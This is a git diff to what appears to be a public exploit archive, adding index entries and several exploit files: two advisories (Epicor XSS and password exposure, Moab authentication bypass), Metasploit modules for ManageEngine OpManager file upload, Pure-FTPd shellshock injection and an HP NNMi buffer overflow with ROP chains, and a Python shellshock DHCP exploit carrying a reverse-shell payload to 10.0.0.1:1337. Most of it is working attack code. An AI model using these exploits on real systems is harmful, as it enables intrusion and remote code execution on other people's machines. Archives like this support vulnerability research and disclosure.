diff --git a/files.csv b/files.csv
index da5d359a3..4e8b2d94a 100755
--- a/files.csv
+++ b/files.csv
@@ -31367,3 +31367,29 @@ id,file,description,date,author,platform,type,port
34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
+34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
+34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
+34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
+34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
+34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-15,anT!-Tr0J4n,windows,remote,0
+34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
+34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure Vulnerability",2009-10-09,Dr_IDE,windows,remote,0
+34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0
+34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
+34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
+34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
+34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
+34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
+34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
+34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
+34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80
+34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0
+34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability",2014-10-02,"Krusty Hack",php,webapps,80
+34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0
+34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80
+34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,metasploit,linux,remote,21
+34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities",2014-10-02,Portcullis,php,webapps,80
+34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443
+34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0
+34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426
+34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
diff --git a/platforms/asp/webapps/34864.txt b/platforms/asp/webapps/34864.txt
new file mode 100755
index 000000000..39367268f
--- /dev/null
+++ b/platforms/asp/webapps/34864.txt
@@ -0,0 +1,72 @@
+"Epicor Enterprise vulnerabilities"
+
+- Affected vendor: Epicor Software Corporation
+- Affected system: Epicor Enterprise - Version 7.4
+- Vendor disclosure date: May 13th, 2014
+- Public disclosure date: September 30th, 2014
+- Status: Fixed
+
+- Associated CVEs:
+
+ 1) CVE-2014-4311
+ Password values not masked appropriately:
+ Even though the application appears to be masking the affected password values
+in the database connection and email settings page, it is possible to access
+their content by observing the HTML code.
+
+ Affected password values:
+ - “Database Connection”
+ - “E-mail Connection”
+
+ Associated CAPEC:
+ CAPEC-167: Lifting Sensitive Data from the Client -
+https://capec.mitre.org/data/definitions/167.html
+
+ Associated CWE:
+ CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html
+
+ 2) CVE-2014-4312
+ Persistent and reflective cross-site scripting (XSS) attacks possible:
+ The identified website is vulnerable to persistent and reflective cross-site
+scripting. Script injection is a weakness within an application, and is due to
+insufficient validation of the input data (i.e. input data being sent from the
+user/presentation layer) and output encoding allowing dynamic execution of
+scripts on the application front end resulting in anomalous/abnormal behaviour
+of the application.
+
+ Example of affected functionalities for persistent XSS:
+ - 1. While viewing Order details, and injecting a malicious payload on the
+"Notes" section.
+ - 2. While modifying an “Order to consume” and injecting a malicious payload
+on the "Description" section.
+ - 3. While observing the “Favorites” section and and injecting a malicious
+payload on the “Favorites name” section.
+ Example of an injected payload:
+
+ Example of affected URLs for reflective XSS:
+ - 1.
+https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=
+ - 2.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt">
+ - 3. https://XXXXX
+/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test">
+ - 4.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName=">
+ - 5.
+https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">-->
+
+ Associated CAPEC:
+ CAPEC-32: Embedding Scripts in HTTP Query Strings -
+https://capec.mitre.org/data/definitions/32.html
+
+ Associated CWE:
+ CWE-79: Improper Neutralization of Input During Web Page Generation
+('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html
+
+- Available fix:
+ Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181
+
+- Credit:
+ These vulnerabilities were discovered by Fara Rustein.
+ If you have any questions, comments, concerns, updates or suggestions please
+contact Fara Rustein (TW: @fararustein).
\ No newline at end of file
diff --git a/platforms/java/remote/34867.rb b/platforms/java/remote/34867.rb
new file mode 100755
index 000000000..7256dabc3
--- /dev/null
+++ b/platforms/java/remote/34867.rb
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
+ The vulnerability exists in the FileCollector servlet which accepts unauthenticated
+ file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on
+ version 11.0 of SocialIT for Windows and Linux.
+ },
+ 'Author' =>
+ [
+ 'Pedro Ribeiro ', # Vulnerability Discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2014-6034' ],
+ [ 'OSVDB', '112276' ],
+ [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 27 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptInt.new('SLEEP',
+ [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
+ ], self.class)
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"),
+ 'method' => 'GET'
+ })
+
+ # A GET request on this servlet returns "405 Method not allowed"
+ if res and res.code == 405
+ return Exploit::CheckCode::Detected
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+
+ def upload_war_and_exec(try_again, app_base)
+ tomcat_path = '../../../tomcat/'
+ servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector'
+
+ if try_again
+ # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration
+ # does not allow us to deploy WARs. Fix that by uploading a new context.xml file.
+ # The file we are uploading has the same content apart from privileged="false" and lots of XML comments.
+ # After replacing the context.xml file let's upload the WAR again.
+ print_status("#{peer} - Replacing Tomcat context file")
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => %q{WEB-INF/web.xml},
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "conf",
+ 'FILENAME' => "context.xml"
+ }
+ })
+ else
+ # We need to create the upload directories before our first attempt to upload the WAR.
+ print_status("#{peer} - Creating upload directories")
+ bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
+ send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => rand_text_alphanumeric(4 + rand(32 - 4)),
+ 'ctype' => 'application/xml',
+ 'vars_get' => {
+ 'regionID' => "",
+ 'FILENAME' => bogus_file
+ }
+ })
+ register_files_for_cleanup("state/archivedata/zip/" + bogus_file)
+ end
+
+ war_payload = payload.encoded_war({ :app_name => app_base }).to_s
+
+ print_status("#{peer} - Uploading WAR file...")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(servlet_path),
+ 'method' => 'POST',
+ 'data' => war_payload,
+ 'ctype' => 'application/octet-stream',
+ 'vars_get' => {
+ 'regionID' => tomcat_path + "webapps",
+ 'FILENAME' => app_base + ".war"
+ }
+ })
+
+ # The server either returns a 500 error or a 200 OK when the upload is successful.
+ if res and (res.code == 500 or res.code == 200)
+ print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
+ " seconds for deployment")
+ sleep(datastore['SLEEP'])
+ else
+ fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed")
+ end
+
+ print_status("#{peer} - Executing payload, wait for session...")
+ send_request_cgi({
+ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+ 'method' => 'GET'
+ })
+ end
+
+
+ def exploit
+ app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+
+ upload_war_and_exec(false, app_base)
+ register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war")
+
+ sleep_counter = 0
+ while not session_created?
+ if sleep_counter == datastore['SLEEP']
+ print_error("#{peer} - Failed to get a shell, let's try one more time")
+ upload_war_and_exec(true, app_base)
+ return
+ end
+
+ sleep(1)
+ sleep_counter += 1
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/linux/remote/34860.py b/platforms/linux/remote/34860.py
new file mode 100755
index 000000000..ff25e8c04
--- /dev/null
+++ b/platforms/linux/remote/34860.py
@@ -0,0 +1,74 @@
+#!/usr/bin/python
+# Exploit Title: dhclient shellshocker
+# Google Dork: n/a
+# Date: 10/1/14
+# Exploit Author: @0x00string
+# Vendor Homepage: gnu.org
+# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
+# Version: 4.3.11
+# Tested on: Ubuntu 14.04.1
+# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
+# ______ ______ ______ _
+# / __ | / __ |/ __ | _ (_)
+#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
+#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
+#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
+# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
+# (_____|
+# _ _ _ _
+# | | | | (_) _
+# _ | | | _ ____| |_ ____ ____ | |_
+# / || | || \ / ___) | |/ _ ) _ \| _)
+#( (_| | | | ( (___| | ( (/ /| | | | |__
+# \____|_| |_|\____)_|_|\____)_| |_|\___)
+#
+# _ _ _ _ _
+# | | | | | | | | |
+# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
+# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___)
+#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| |
+#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_|
+
+# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
+# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
+# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
+# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.
+
+import socket, struct
+def HexToByte( hexStr ):
+ b = []
+ h = ''.join( h.split(" ") )
+ for i in range(0, len(h), 2):
+ b.append( chr( int (h[i:i+2], 16 ) ) )
+ return ''.join( b )
+
+rport = 68
+lport = 67
+
+bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+
+bsock.bind(("", lport))
+
+while True:
+
+ OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
+ URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")
+ URLLEN = chr(len(URL) / 2).encode("hex")
+ END = "03040a000001ff"
+ broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)
+ hexip = broadcast_get[245:249]
+ rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))
+ XID = broadcast_get[4:8].encode("hex")
+ chaddr = broadcast_get[29:34].encode("hex")
+ print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n"
+ OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
+ OFFER_BYTES = HexToByte(OFFER)
+ ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
+ ACK_BYTES = HexToByte(ACK)
+ print "[+]\tsending evil offer\n"
+ sock.sendto(OFFER_BYTES, (rhost, rport))
+ broadcast_get2 = bsock.recvfrom(2048)
+ print "[+]\tassuming request was received, sending ACK\n"
+ sock.sendto(ACK_BYTES, (rhost, rport))
+
diff --git a/platforms/linux/remote/34862.rb b/platforms/linux/remote/34862.rb
new file mode 100755
index 000000000..e41879a6b
--- /dev/null
+++ b/platforms/linux/remote/34862.rb
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Ftp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
+ 'Description' => %q(
+ This module exploits the code injection flaw known as shellshock which
+ leverages specially crafted environment variables in Bash. This exploit
+ specifically targets Pure-FTPd when configured to use an external
+ program for authentication.
+ ),
+ 'Author' =>
+ [
+ 'Stephane Chazelas', # Vulnerability discovery
+ 'Frank Denis', # Discovery of Pure-FTPd attack vector
+ 'Spencer McIntyre' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-6271'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 2048
+ },
+ 'Targets' =>
+ [
+ [ 'Linux x86',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'CmdStagerFlavor' => :printf
+ }
+ ],
+ [ 'Linux x86_64',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86_64,
+ 'CmdStagerFlavor' => :printf
+ }
+ ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'PrependFork' => true
+ },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Sep 24 2014'))
+ register_options(
+ [
+ Opt::RPORT(21),
+ OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
+ ], self.class)
+ deregister_options('FTPUSER', 'FTPPASS')
+ end
+
+ def check
+ # this check method tries to use the vulnerability to bypass the login
+ username = rand_text_alphanumeric(rand(20) + 1)
+ random_id = (rand(100) + 1)
+ command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
+ if send_command(username, command) =~ /^2\d\d ok./i
+ return CheckCode::Safe if banner !~ /pure-ftpd/i
+ disconnect
+
+ command = "echo auth_ok:0; echo end"
+ if send_command(username, command) =~ /^5\d\d login authentication failed/i
+ return CheckCode::Vulnerable
+ end
+ end
+ disconnect
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, _opts)
+ cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+ username = rand_text_alphanumeric(rand(20) + 1)
+ send_command(username, cmd)
+ end
+
+ def exploit
+ # Cannot use generic/shell_reverse_tcp inside an elf
+ # Checking before proceeds
+ if generate_payload_exe.blank?
+ fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
+ end
+
+ execute_cmdstager(linemax: 500)
+ handler
+ end
+
+ def send_command(username, cmd)
+ cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
+ connect
+ send_user(username)
+ password_result = send_pass(cmd)
+ disconnect
+ password_result
+ end
+end
\ No newline at end of file
diff --git a/platforms/linux/remote/34866.rb b/platforms/linux/remote/34866.rb
new file mode 100755
index 000000000..5af7a53a0
--- /dev/null
+++ b/platforms/linux/remote/34866.rb
@@ -0,0 +1,229 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Udp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Network Node Manager I PMD Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
+ vulnerability exists in the pmd service, due to the insecure usage of functions like
+ strcpy and strcat while handling stack_option packets with user controlled data. In
+ order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
+ the stack and finally build the rop chain to avoid NX.
+ },
+ 'Author' =>
+ [
+ 'd(-_-)b', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-2624'],
+ ['ZDI', '14-305']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ 'Space' => 3000,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
+ }
+ },
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Targets' =>
+ [
+ ['Automatic', {}],
+ ['HP NNMi 9.10 / CentOS 5',
+ {
+ # ptr to .rodata with format specifier
+ #.rodata:0003BE86 aS_1 db '%s',0
+ 'ov_offset' => 0x3BE86,
+ :rop => :rop_hp_nnmi_9_10
+ }
+ ],
+ ['HP NNMi 9.20 / CentOS 6',
+ {
+ # ptr to .rodata with format specifier
+ #.rodata:0003C2D6 aS_1 db '%s',0
+ 'ov_offset' => 0x3c2d8,
+ :rop => :rop_hp_nnmi_9_20
+ }
+ ]
+ ],
+ 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
+ 'DisclosureDate' => 'Sep 09 2014',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([ Opt::RPORT(7426) ], self.class)
+ end
+
+ def check
+ header = [
+ 0x2a5, # pmdmgr_init pkt
+ 0x3cc, # signature
+ 0xa0c, # signature
+ 0xca8 # signature
+ ].pack("V")
+
+ data = "\x00" * (0xfa4 - header.length)
+
+ pkt = header + data
+
+ connect_udp
+ udp_sock.put(pkt)
+ res = udp_sock.timed_read(8, 1)
+ if res.blank?
+ # To mitigate MacOSX udp sockets behavior
+ # see https://dev.metasploit.com/redmine/issues/7480
+ udp_sock.put(pkt)
+ res = udp_sock.timed_read(8)
+ end
+ disconnect_udp
+
+ if res.blank?
+ return Exploit::CheckCode::Unknown
+ elsif res.length == 8 && res.unpack("V").first == 0x2a5
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ def exploit
+ connect_udp
+ # info leak with a "proto_tbl" packet
+ print_status("Sending a 'proto_tbl' request...")
+ udp_sock.put(proto_tbl_pkt)
+
+ res = udp_sock.timed_read(13964, 1)
+ if res.blank?
+ # To mitigate MacOSX udp sockets behavior
+ # see https://dev.metasploit.com/redmine/issues/7480
+ udp_sock.put(proto_tbl_pkt)
+ res = udp_sock.timed_read(13964)
+ end
+
+ if res.blank?
+ fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
+ end
+
+ if target.name == 'Automatic'
+ print_status("Fingerprinting target...")
+ my_target = auto_target(res)
+ fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
+ else
+ my_target = target
+ fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
+ end
+
+ print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
+
+ # exploit with a "stack_option_pkt" packet
+ udp_sock.put(stack_option_pkt(my_target, @ov_base))
+
+ disconnect_udp
+ end
+
+ def rop_hp_nnmi_9_10(ov_base)
+ rop = rand_text_alpha(775)
+ rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret
+ rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got
+ rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored:
+ # "PMD Stack option specified, but stack not available (user_controlled)"
+ rop << [0x808d7c2].pack("V") # pop ebp # ret
+ rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
+ rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence:
+ #.text:0001D692 lea eax, [ebp+dest]
+ #.text:0001D698 push eax ; command
+ #.text:0001D699 call _system
+ rop
+ end
+
+ def rop_hp_nnmi_9_20(ov_base)
+ rop = rand_text_alpha(775)
+ rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
+ rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
+ #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)
+ #.text:0001DAEC push eax ; command
+ #.text:0001DAED call _system
+ rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored:
+ # "PMD Stack option specified, but stack not available (user_controlled)"
+ rop << rand_text_alpha(4) # ebp: padding
+ rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
+ rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret
+ rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
+ rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
+ rop << rand_text_alpha(4) # ebx: padding
+ rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
+ rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
+ rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
+ rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
+ rop << [0x80528BC].pack("V") # jmp eax
+
+ rop
+ end
+
+ def stack_option_pkt(t, ov_base)
+ hdr = [0x2a9].pack("V") # stack_option packet
+ data = "-SA" # stack name (invalid one 'A')
+ data << ";" # separator
+ data << self.send(t[:rop], ov_base) # malformed stack options
+ data << payload.encoded
+ data << ";\n"
+ data << "\x00" * (0xfa4 - data.length - hdr.length)
+
+ hdr + data
+ end
+
+ def proto_tbl_pkt
+ hdr = [0x2aa].pack("V") # proto_tbl packet
+ data = "\x00" * (0xfa4 - hdr.length)
+
+ hdr + data
+ end
+
+ def base(address, offset)
+ address - offset
+ end
+
+ def find_ov_base(t, data)
+ print_status("Searching #{t.name} pointers...")
+ i = 0
+ data.unpack("V*").each do |int|
+ if base(int, t['ov_offset']) % 0x1000 == 0
+ print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
+ @ov_base = base(int, t['ov_offset'])
+ return true
+ end
+ i = i + 1
+ end
+
+ false
+ end
+
+ def auto_target(data)
+ targets.each do |t|
+ next if t.name == 'Automatic'
+ if find_ov_base(t, data)
+ return t
+ end
+ end
+
+ nil
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/multiple/webapps/34865.txt b/platforms/multiple/webapps/34865.txt
new file mode 100755
index 000000000..5b96adb07
--- /dev/null
+++ b/platforms/multiple/webapps/34865.txt
@@ -0,0 +1,110 @@
+##[Moab Authentication Bypass : CVE-2014-5300]##
+
+Software: Moab
+Affected Versions: All versions prior to Moab 7.2.9 and Moab 8
+CVE Reference: CVE-2014-5300
+Author: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/)
+Severity: High Risk
+Vendor: Adaptive Computing
+Vendor Response: Resolved in Moab 7.2.9 and Moab 8
+
+
+##[Description]
+
+It is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8.
+
+
+##[Impact]
+
+Successful exploitation could lead to remote code execution.
+
+
+##[Cause]
+
+The Moab server does not appropriately authenticate requests.
+
+
+##[Solution]
+
+Upgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication.
+
+This issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue.
+
+
+##[Technical Details]
+
+Moab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below:
+
+
+
+ 7v49VzAlbyNQ4O3VChCus+v2LeE=
+ QG13cmxhYnMgRWFzdGVyIEVnZyE=
+
+
+
+
+
+ test
+ test
+ test
+ /home/test
+ 2
+ /usr/bin/id
+ PBS
+ \START/usr/bin/id\0a\0a
+
+
+
+
+
